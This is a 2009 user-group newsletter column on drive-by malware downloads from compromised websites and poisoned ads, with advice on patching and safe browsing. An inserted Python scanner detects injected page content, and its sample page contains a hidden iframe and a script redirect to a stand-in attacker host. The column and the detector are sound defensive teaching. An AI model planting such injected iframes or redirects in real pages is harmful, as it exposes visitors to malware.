Tech Talk (09/07)
Drive-by Infections
by Brian K. Lewis, Ph.D.*
Member of the Sarasota Personal Computer Users Group, Inc.
How safe do you feel when surfing the
web? As a savvy computer
user you no doubt keep your computer safe while browsing the web through
the use of anti-virus software, firewall software, anti-spyware, etc.
These anti-malware applications will protect your computer from
dangerous software that can be transferred to your computer by some
active means or a "Push" from another source. However, are you aware
that your computer can "Pull" malware from a Website without your
knowledge or active intervention? Such malware can get through all of
your active defenses because it is part of the Web page you are
downloading and may appear safe to all of your defenses!
Many people think that they couldn’t possibly get
malware from the Websites they visit because they are all very
respectable businesses. Unfortunately, it seems that any Website can
become a host to malware. Google has used its Web indexing system to
systematically look for malicious Websites over a twelve month period.
(The Ghost in the Browser – Niels Provos, et al., Google, Inc.) At
least 10% of the 4.5 million sites they had checked, by the time of
publication, have "drive-by" downloads. Over 700,000 additional sites
have other malware associated with them. So what is a drive-by download?
It is the transfer of malware which occurs without any action on the
part of the viewer other than the download of the Web page. Just
remember you can’t see any Web page until the code that produces it has
been transferred to your computer’s memory and then, put up on your
video screen.
Usually, most of a Website’s content is created by
the Website owner. However, as more and more Websites are supported by
advertising, they may also display ads from third-party advertising
networks. These ads are usually connected to the Web page via external
JavaScript or iframes. (See the May 2008 issue of the SPCUG Monitor for
more on iframes.) Moreover, some sites allow users to contribute their
own content, for example via postings to forums or blogs. Depending on
the individual site’s policies, user contributed content may be
restricted to text files, but it often can also contain HTML code (Hyper
Text Markup Language) which provides links to images or other external
content. HTML is the language used to write web page code. Web pages
also may have third-party content such as visitor counters or complex
calendars. In Google’s research paper they cite a number of examples of
code which can be hidden in a Web page. In some cases it can be a simple
JavaScript program that redirects the viewer to an entirely different
Web page. One example cited was a visitor counter which had its code
revised to include a command to change the Web site being viewed. This
was inserted some three years after the page was originally published.
You might think that changing the page you are viewing would be very
obvious in the address line of your browser. However, the name in the
address line is not the true address; the true address is always given
by a series of numbers, and what you see is a name that has been
converted from it. So the address shown in the browser can be readily
"spoofed" as part of the page redirection by the malware code.
The drive-by download uses the browser (Internet
Explorer, Firefox, Safari, Opera, etc.) as the mechanism to connect
computer users to Web servers rigged with malware code. In the drive-by
attack, the malware program is automatically downloaded to your computer
without your consent or even your knowledge. The attack actually occurs
in two steps. The user surfs to a Website that has been rigged with
code that in turn redirects the connection to a malicious third-party
server hosting malware code. That code can target vulnerabilities in
the Web browser, an unpatched browser plug-in, a vulnerable ActiveX
control, or any other third-party software flaw, such as those found in
unpatched versions of Adobe Reader.
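As an added illustration, not part of the original column, here is a small Python scanner that flags the kinds of injected page content described above: hidden iframes, scripts loaded from a host other than the page's own, meta-refresh redirects, and inline scripts that rewrite the browser location. The sample page and the host names in it are constructed for the example; the heuristics are deliberately simple and would need tuning against real pages.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script heuristic: an assignment to location (not a comparison) or location.replace().
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=(?!=)|location\.replace\(", re.I)


class InjectionScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()  # host the page itself was served from
        self.findings = []                  # (kind, detail) tuples
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names for us
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if (a.get("width") == "0" or a.get("height") == "0"
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            host = urlparse(a.get("src") or "").hostname
            if host and host.lower() != self.page_host:
                self.findings.append(("third-party-script", a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as plain data; look for location rewrites.
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append(("inline-redirect", data.strip()[:60]))


def scan_html(html, page_host):
    # Return the (kind, detail) findings for a page served by page_host.
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    return scanner.findings


# Constructed sample: a local counter script, an ad-network script, a zero-size
# iframe and an inline redirect (the shape of an attacker's inserted line).
SAMPLE_PAGE = """<html><body>
<script src="/js/counter.js"></script>
<script src="http://ads.example.net/show.js"></script>
<iframe src="http://evil.example.org/x.html" width="0" height="0"></iframe>
<script>window.location = "http://evil.example.org/landing";</script>
</body></html>"""
```

Calling scan_html(SAMPLE_PAGE, "www.example.com") reports the ad-network script, the hidden iframe and the inline redirect, while the site's own counter script is left alone.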
One example of a problem which might make a user vulnerable to malware
is contained in Microsoft Security Bulletin 03-011. Here is the
pertinent quotation from this bulletin.
"In order to exploit this vulnerability via the
Web-based attack vector, the attacker would need to entice the user into
visiting a site the attacker controlled. The vulnerability itself
provides no way to force a user to a Website."
However, if a script redirects the user’s browser
without his/her knowledge and the attacker’s Website then exploits a
known vulnerability in the operating system, it is hardly the user’s
fault. However, if a patch for the specific "hole" is available but
hasn't been installed, then you can certainly blame the user. It is an
accepted fact that many users, possibly as many as 65%, do not install
the updates to their operating systems. This is in spite of the fact
that Microsoft sets automatic downloads and installs as the default
method for updating both Windows XP and Vista.
Another real world example of a drive-by download
involved the Website for the Miami Dolphins. In 2007, before the Super
Bowl, one line was inserted into the HTML code for the Dolphin’s Website that was designed to cause a transfer to a third party site. A
visitor to the Dolphin site, with an unpatched Windows computer, was
silently connected to a remote third party that attempted to exploit
known vulnerabilities described by Microsoft’s MS06-014 and MS07-004
security bulletins. (Note that the 06 and 07 indicate the year the
bulletin was issued.) If the exploit was successful, a Trojan was
silently installed that gave the attacker full access to the compromised
computer. The attacker could later take advantage of the compromised
computer in order to steal confidential information or to launch Denial
of Service (DoS) attacks.
Another example of drive-by malware is that found on
"poisoned" advertising sites. More and more advertising is appearing on
every Website. Users who click on ads may be directed to servers which
have been "poisoned" and end up on servers which contain a host of
drive-by malware. Another link to malware sites has been shown to be
sites selected by certain keywords during Internet searches. For
example, the top results of any search containing the word "screensaver"
had a 59% chance of including a malware site according to a report
published by McAfee (The Web's Most Dangerous Search Terms). If the
search included the term "lyrics", the results had a 25% chance of being
malware sites, or one out of every four results. This was followed
closely by the term "free".
Malware "kits" serve as the engine for drive-by
downloads. These kits are professionally written software that can be
hosted on a server with a database backend. The kits, which are sold on
underground hacker sites, are fitted with exploits for vulnerabilities
in a range of widely deployed desktop applications, including Apple’s
QuickTime media player, Adobe Flash Player, Adobe Reader, RealNetworks’
RealPlayer, and WinZip. Identity thieves and other malware authors
purchase these code kits and deploy them on a malicious server. Code is
then embedded on Web sites to redirect traffic to that malicious server.
Additionally, lures to those sites are spammed via e-mail or bulletin
boards. These kits can also be designed to determine which browser and
operating system are being used and their versions. That way a tailored
malware application, or applications, can be used to exploit all the
possible vulnerabilities. They can also determine the third-party
software being used and tailor the response to its vulnerabilities.
The lesson from all this says that it is very
important for computer users to install the security patches that
Microsoft makes available. Many of the exploits identified by various
security organizations are related to holes that were patched months and
years ago. The problem is that many businesses and individuals do not
stay up to date on the installation of these patches. So here are a few
ways you can try to protect your computer from drive-by downloads:
- Use a patch management solution that assists with finding – and
  fixing – all third-party desktop applications. Just one example:
  Secunia offers two tools – Personal Software Inspector and Network
  Security Inspector – that can help identify unpatched applications.
- Use a desktop browser that includes anti-phishing and anti-malware
  blockers. Microsoft's Internet Explorer, Mozilla Firefox, and Opera
  all provide security features to block malicious sites. However, you
  should be using the latest versions to get the protection.
- Enable a firewall and apply all Microsoft operating system updates.
  Avoid using pirated software, which has its updates disabled through
  Windows Genuine Advantage (WGA), although Microsoft has stated that
  all Windows software receives security updates.
- Install anti-virus/anti-malware software and be sure to keep its
  databases updated. Make sure your anti-virus provider is using a
  browser traffic scanner (such as Avast) to help pinpoint potential
  problems from drive-by downloads. If your A/V scanner has a web
  scanner function and you haven't activated it, do it now.
There is an additional safeguard which most Windows
users ignore. You should never surf the Internet while you are running
your computer as the Administrator. You should always set up a User
account for this purpose. In addition, both the User account and the
Administrator account should be password protected. This does not
guarantee that you will be protected from "zero-day" exploits, those
which have not been patched, but it will reduce the possibility of such
events.
Last but not least, you can do your surfing from a
sandbox. Check out my article on Sandbox Computing in the January 2009
SPCUG Monitor.
Always be aware that someone out there is trying to
redirect your computer to a malware site and keep your defenses up.
*Dr. Lewis is a former university and medical school professor of physiology. He has been working with personal computers for over thirty years, developing software and assembling systems. He can be reached at bwsail at yahoo.com.
Copyright 2009. This article is from the
July 2009 issue of the
Sarasota PC Monitor, the official monthly publication of the Sarasota
Personal Computer Users Group, Inc., P.O. Box 15889, Sarasota, FL
34277-1889. Permission to reprint is granted only to other non-profit
computer user groups, provided proper credit is given to the author and
our publication. We would appreciate receiving a copy of the publication
the reprint appears in, please send to above address, Attn: Editor. For
further information about our group, email:
admin@spcug.org // Web: http://www.spcug.org/
The Sarasota Personal Computer Users Group, Inc. has 1,100+ members
and was established in 1982. We are members of the Assoc. of PC User
Groups (APCUG), the Florida Assoc. of PC Users Groups, Inc., and we are
members of the America Online Ambassador Program.
For all reviews from the Sarasota PC Monitor, see http://www.spcug.org
and go to the Newsletter Section.